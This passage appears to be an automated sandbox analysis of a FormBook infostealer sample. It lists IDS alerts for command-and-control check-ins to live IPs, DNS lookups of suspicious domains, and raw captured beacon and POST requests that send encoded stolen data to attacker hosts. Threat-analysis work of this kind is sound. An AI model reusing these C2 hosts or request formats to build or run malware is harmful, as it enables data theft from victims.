            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63345 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63328 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63372 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63338 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63320 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63372 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63320 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63370 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63373 -> 38.181.141.122:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63324 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63319 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63334 -> 147.92.40.175:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63355 -> 104.21.11.31:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63323 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63353 -> 104.21.11.31:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63374 -> 38.181.141.122:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63361 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63324 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63341 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63360 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63358 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63360 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63376 -> 38.181.141.122:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63376 -> 38.181.141.122:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63318 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63369 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63354 -> 104.21.11.31:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63321 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63330 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63349 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63339 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63348 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63348 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63357 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63327 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63363 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63329 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63331 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63364 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63364 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63344 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63344 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63365 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63350 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63371 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63377 -> 81.88.63.46:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63377 -> 81.88.63.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63337 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63333 -> 147.92.40.175:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63352 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63352 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63351 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63356 -> 104.21.11.31:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63356 -> 104.21.11.31:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.heldhold.xyz
            Source: DNS query: www.rtpngk.xyz
            Source: DNS query: www.030002304.xyz
            Source: Joe Sandbox ViewIP Address: 67.223.117.189 67.223.117.189
            Source: Joe Sandbox ViewIP Address: 65.21.196.90 65.21.196.90
            Source: Joe Sandbox ViewASN Name: VIMRO-AS15189US VIMRO-AS15189US
            Source: Joe Sandbox ViewASN Name: DNC-ASDimensionNetworkCommunicationLimitedHK DNC-ASDimensionNetworkCommunicationLimitedHK
            Source: Joe Sandbox ViewASN Name: CP-ASDE CP-ASDE
            Source: Joe Sandbox ViewASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0076550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_0076550C
            Source: global trafficHTTP traffic detected: GET /a4ar/?V0Qh=4pBta8&pP_8=bigEPZ6XMKFUrjbnFuEouLJTNPVDiP/j9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOAdNfbVj3/yE4LVCgAj4ckDbKMFX8mxMH3uQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.2bhp.comConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8pln/?pP_8=T9/DtY4QstE2hf5O1waUB+I/eJ4Uv9cvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9oL792aB/FoBSyK+aeSTPR1nXcfMqNX8wInY=&V0Qh=4pBta8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.ultraleap.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /v2c3/?V0Qh=4pBta8&pP_8=4KW7rJi8xQgG5Juif0zvrQruwxJNCZQzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxev+uUFboPihN5w7Wu/KeDCgTl/GYzmTNxclA= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dalong.siteConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /xamn/?pP_8=eI40u+kXl6dCNOxuFKbCigR1N86mEgfKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR6R1adFopucWDE2ha6/s1PPXDYip6cFIdDHY=&V0Qh=4pBta8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mgeducacaopro.onlineConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /fava/?pP_8=GCDZpLqdSYk7fT5CRgwCB4qcStchn8AdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQCgtKpqiTYCqf8kUZvClY0WdZB6RiKYyZbbU=&V0Qh=4pBta8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.heldhold.xyzConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /5o7d/?pP_8=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGduAov/pmUDz/4soHslE7c+cNQZpL9+8t0WKA=&V0Qh=4pBta8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.63582.photoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /68ac/?V0Qh=4pBta8&pP_8=UdQRT8UlMLNCwpgj6kWQKKLq7pbVYmfVdUpnkoxSG75WqbyVgEBEWfcixBuHZAqOTbF9B+kCTwT7w8BXHK8l9WrkSPCW1YJ7B21iYQxfbqK0tW+zUb3ShNU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.useanecdotenow.techConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /kt2f/?pP_8=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&V0Qh=4pBta8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.asiapartnars.onlineConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /al6z/?pP_8=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw=&V0Qh=4pBta8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.linkwave.cloudConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /3lu7/?pP_8=nzWofdhWpyQTuQkDfxpOhZSR2SP28ZN4SJ26h7kwykQFM8AQx5IfrLSrYivs6QFJHI8FrKvcoPkOi5L1XFRCLbCiXi5UAF8H0knLfKrCbz8tBFYRfGccZ0A=&V0Qh=4pBta8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mfgarage.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /zznj/?V0Qh=4pBta8&pP_8=XN/afWzprYUm2zEh/Me8v7IO6BZfJ8ldqsTKqfvYzDGyGH3Qqe2ibLEK4zu3d4hkDWgHsBH7o/PgLSUsZsuwL2SV1lDf+BUf6ZfDIcx/0TWTXhhDzyKZrRs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.b5x7vk.agencyConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /altr/?pP_8=VbdX0kog8qSHBufLtK+0qwwL6pFhzbi14fGg/CN3kiEzjMV75sm4cjiJhcKV1R019AsMCDZ1hQxpRPghO7Wf1QtEjpaGbTqiMLtSz+Xi+YiI4oFd5iwYses=&V0Qh=4pBta8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.rtpngk.xyzConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /hzuv/?V0Qh=4pBta8&pP_8=yPYTPsOMRuT7nXzMZEh0cyOx75sbkvhbS623oo+vDaz4p8qW1TPOp1vW0qrZ2oW5wmcFkFH8avXQJuay0KjCNQuKV15vU1edPek8xw4GryuOme+JkwmIlF8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.doggieradio.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /v4cy/?pP_8=Y61bwknhs9hp9ZZcYkoE/rAHAVoATd7g+jLHgGwEyJh/LKrsM6hsQ8y2QWfg6r+Pzdmi8z7VAqFTz6bCx0F+lD/ii+PJJ/2nHI8msyIEMT4A2MQn/4udzH0=&V0Qh=4pBta8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.40wxd.topConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /tmpg/?pP_8=CVP6mu+p7AIAUeNlIzILzbbwoLVaLtEPp22R6YZws2HFwQ6gURLmFkDuTnsSzWDqU9qDd9fOW/TdFJInumJ7doiOdR5iBNH/a8rQv0stnRBrBPHE6g/KoYg=&V0Qh=4pBta8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.030002304.xyzConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /c0yj/?pP_8=RtxJIiPVwFtoON8X5lg1/pck0zde3AcVW+Sw8LHuBGbwhWeZHgga75pQywOD+eRBU36nZddvjNScILyGR/VfIgCLIuIjBhPcY00gClaWQM5nJXPcxtJH+zI=&V0Qh=4pBta8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kfowks.siteConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a4ar/?V0Qh=4pBta8&pP_8=bigEPZ6XMKFUrjbnFuEouLJTNPVDiP/j9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOAdNfbVj3/yE4LVCgAj4ckDbKMFX8mxMH3uQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.2bhp.comConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.2bhp.com
            Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: www.ultraleap.net
            Source: global trafficDNS traffic detected: DNS query: www.dalong.site
            Source: global trafficDNS traffic detected: DNS query: www.mgeducacaopro.online
            Source: global trafficDNS traffic detected: DNS query: www.heldhold.xyz
            Source: global trafficDNS traffic detected: DNS query: www.63582.photo
            Source: global trafficDNS traffic detected: DNS query: www.useanecdotenow.tech
            Source: global trafficDNS traffic detected: DNS query: www.asiapartnars.online
            Source: global trafficDNS traffic detected: DNS query: www.linkwave.cloud
            Source: global trafficDNS traffic detected: DNS query: www.mfgarage.net
            Source: global trafficDNS traffic detected: DNS query: www.b5x7vk.agency
            Source: global trafficDNS traffic detected: DNS query: www.rtpngk.xyz
            Source: global trafficDNS traffic detected: DNS query: www.doggieradio.net
            Source: global trafficDNS traffic detected: DNS query: www.40wxd.top
            Source: global trafficDNS traffic detected: DNS query: www.030002304.xyz
            Source: global trafficDNS traffic detected: DNS query: www.kfowks.site
            Source: unknownHTTP traffic detected: POST /8pln/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.ultraleap.netOrigin: http://www.ultraleap.netContent-Length: 201Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeReferer: http://www.ultraleap.net/8pln/User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36Data Raw: 70 50 5f 38 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 34 36 70 41 31 52 66 4e 51 72 73 6b 61 4b 4d 33 35 76 51 7a 47 57 52 74 63 31 66 38 33 30 62 31 4a 32 38 54 46 74 63 79 2b 44 4e 50 4c 41 73 55 63 6f 4e 74 50 70 6e 76 58 68 6d 33 72 38 48 6b 4b 75 77 70 76 39 69 48 6f 37 6a 45 77 70 42 4e 61 49 78 51 76 36 4f 4b 59 53 36 7a 5a 32 50 51 61 72 4d 72 4d 43 34 36 48 6b 76 6b 49 63 47 36 46 6e 6e 43 68 55 32 55 4c 69 43 57 57 52 4a 79 36 78 45 50 35 46 42 39 4b 76 44 46 72 55 6d 70 2b 51 72 33 6a 76 6d 39 63 42 63 65 56 73 4c 48 56 55 55 63 2b 39 67 31 66 62 72 70 56 46 65 49 5a 7a 77 55 46 41 3d 3d Data Ascii: pP_8=e/XjuvFYh54w46pA1RfNQrskaKM35vQzGWRtc1f830b1J28TFtcy+DNPLAsUcoNtPpnvXhm3r8HkKuwpv9iHo7jEwpBNaIxQv6OKYS6zZ2PQarMrMC46HkvkIcG6FnnChU2ULiCWWRJy6xEP5FB9KvDFrUmp+Qr3jvm9cBceVsLHVUUc+9g1fbrpVFeIZzwUFA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:17:25 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 34 61 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /a4ar/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 11 Sep 2024 09:17:55 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 